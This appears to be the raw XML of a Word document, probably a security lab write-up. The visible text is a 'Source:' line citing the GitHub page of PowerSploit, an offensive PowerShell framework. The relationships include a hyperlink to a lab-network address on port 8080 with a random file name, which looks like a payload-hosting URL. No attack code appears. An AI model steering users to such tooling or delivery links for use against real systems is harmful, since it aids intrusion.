        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D702E5" w14:textId="023732F2" w:rsidR="00A15F9D" w:rsidRPr="00A15F9D" w:rsidRDefault="00666CA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t>https://github.com/PowerShellMafia/PowerSploit</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A15F9D" w:rsidRPr="00A15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2D9F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE30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B413D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E40E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C5793"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1C6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A7340"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7886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000C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E602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318749">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="977802511">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="400518415">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1683123939">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1942836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2D"/>
    <w:rsid w:val="00066CF3"/>
    <w:rsid w:val="00105FE4"/>
    <w:rsid w:val="002A37AD"/>
    <w:rsid w:val="002A4D89"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00666CA4"/>
    <w:rsid w:val="00687158"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00863EA3"/>
    <w:rsid w:val="008D699E"/>
    <w:rsid w:val="00A15F9D"/>
    <w:rsid w:val="00F4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62512"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{50AC888B-FCA3-4C3A-9667-689A665F4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1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5F9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63E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E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2.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11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0.tmp"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.tm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hyperlink" Target="http://10.10.31.2:8080/Bn75U0NL8ONS.h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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-02T06:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-02T07:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>